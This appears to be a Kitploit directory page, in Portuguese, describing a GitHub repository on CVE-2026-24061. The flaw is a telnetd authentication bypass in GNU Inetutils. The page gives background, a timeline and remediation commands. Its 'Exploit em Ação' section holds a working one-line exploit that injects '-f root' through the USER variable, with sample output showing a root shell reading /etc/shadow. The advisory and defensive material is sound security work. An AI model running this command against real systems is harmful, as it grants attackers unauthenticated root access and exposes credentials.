Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-24061 — CVE-2026-24061 | Kitploit
Ferramentas/GitHubGitHub/0xblackash/cve-2026-24061
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHub0xblackash/cve-2026-24061

CVE-2026-24061

CVE-2026-24061

Ver Repositório
146há 3 mesesAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 CVE-2026-24061 — “TelneTD”

Imagem ChatGPT 25 de Junho de 2026, 15:03:25

Crítico Bypass de Autenticação Remota no GNU Inetutils telnetd
O fantasma de 2015 acaba de voltar para dominar tudo que ainda roda telnet.

CVSS Badge Status Badge KEV Badge Type Badge

Zero autenticação. Uma variável de ambiente. Shell root instantâneo.


⚠️ Visão Geral

CVE-2026-24061 é uma vulnerabilidade crítica de escalonamento de privilégio remoto no GNU Inetutils telnetd ≤ 2.7.

Um atacante remoto não autenticado define a variável de ambiente USER como "-f root" através da opção Telnet NEW-ENVIRON.
O telnetd passa esse valor sem sanitização diretamente para /bin/login → o login vê -f root → ignora toda autenticação → joga o atacante em um shell root.

O código perigoso ficou quieto na árvore por quase 11 anos (desde ~2015).

“Uma variável de ambiente. Nenhuma senha. Root total. Bem-vindo a 2026.”


🔥 Severidade e Impacto

  • CVSS v3.1 Pontuação Base: 9.8 / Crítico
    AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
  • Vetor de Ataque: Rede (TCP/23)
  • Privilégios Necessários: Nenhum
  • Interação do Usuário: Nenhuma
  • Maturidade do Exploit: Trivial (um comando funciona a partir de qualquer cliente telnet)

Realidade em Março de 2026:

  • Varreduras em massa e exploração observadas desde o final de janeiro
  • Dispositivos embarcados legados, equipamentos de OT, servidores de teste esquecidos ainda abertos
  • Comprometimento total do sistema: credenciais, persistência, ponto de entrada para ransomware

🕵️ Descoberta

  • Reportado privadamente aos mantenedores do GNU em meados de janeiro de 2026
  • Divulgado publicamente via oss-security no final de janeiro de 2026
  • Corrigido no GNU Inetutils ≥ 2.8 (lançado logo após a divulgação)

🔬 Mergulho Técnico Profundo

Quando o telnetd recebe uma opção NEW-ENVIRON contendo:

USER=-f root

Ele anexa o valor diretamente ao argv passado para /bin/login:

execve("/bin/login", ["login", "-f", "root", ...], ...)

O binário login interpreta -f root como:
“este usuário já está autenticado como root — nenhuma verificação de senha necessária.”

→ O atacante obtém o prompt #. Fim de jogo.

Escolha de design fatal: o encaminhamento -R / da variável de ambiente nunca foi restrito a usuários autorizados.


📅 Linha do Tempo

DataEvento
~Março 2015Introdução do tratamento vulnerável de env
Jan 2026Relatório privado para o upstream
Fim Jan 2026Divulgação pública e atribuição de CVE
Fim Jan 2026Correção lançada (Inetutils ≥ 2.8)
26 Jan 2026Adicionado ao catálogo de Vulnerabilidades Conhecidas Exploradas da CISA
Fev–Mar 2026Pico de exploração contra sistemas legados/OT
Março 2026Muitos fornecedores de embarcados ainda silenciosos ou sem correção

🖥️ Sistemas Afetados

Versões vulneráveis: GNU Inetutils telnetd 1.9.3 – 2.7
Alvos comuns em 2026:

  • Controladores industriais legados e IHM
  • Roteadores antigos, switches, impressoras
  • Aparelhos embarcados derivados do Debian
  • VMs e contêineres de teste/dev esquecidos
  • Gateways de OT ainda expondo TCP/23

Seguros:

  • Sistemas rodando busybox telnetd
  • Inetutils ≥ 2.8
  • Telnet completamente desabilitado / protegido por firewall

💥 Exploit em Ação

Comando único (qualquer Linux/macOS com cliente telnet):

USER="-f root" telnet -a 192.168.1.50

Saída típica:

telned
┌──(atacante㉿kali)-[~]
└─$ USER="-f root" telnet -a 192.168.1.50
Trying 192.168.1.50...
Connected to 192.168.1.50.
Escape character is '^]'.

Debian GNU/Linux 12 telnetd

root@legacy-box:~# whoami
root
root@legacy-box:~# id
uid=0(root) gid=0(root) groups=0(root)
root@legacy-box:~# cat /etc/shadow
...

Um pressionamento de tecla Enter depois — acesso root completo.


🛡️ Verificar e Remediar (Março 2026)

1. Detectar serviço vulnerável

telnet localhost 23   # procurar banner inetutils
inetutils-telnetd --version   # vulnerável se ≤ 2.7

2. Matá-lo (preferido para sempre)

systemctl disable --now inetutils-inetd   # ou telnet.socket
pkill telnetd && chmod -x /usr/sbin/telnetd

3. Atualizar (apenas se precisar manter telnet — raro)

sudo apt update && sudo apt install --reinstall inetutils-telnetd   # → ≥2.8

4. Firewall (cinto e suspensórios)

iptables -A INPUT -p tcp --dport 23 -j DROP
ufw deny 23/tcp

📈 Status — Março 2026

  • Exploração continua contra dispositivos legados sem correção
  • Uso de telnet em mínimos históricos — mas ainda mortal quando presente
  • Lição do ecossistema: protocolos legados são minas terrestres

🎓 Lições Gravadas em Pedra

  • Bugs de 11 anos ainda se escondem em código “morto”
  • Nunca passe entrada de usuário não sanitizada para binários que geram root
  • Injeção de argumento → root é atemporal
  • Telnet deveria ter morrido em 2010. Mate-o em 2026.
Baixar ferramenta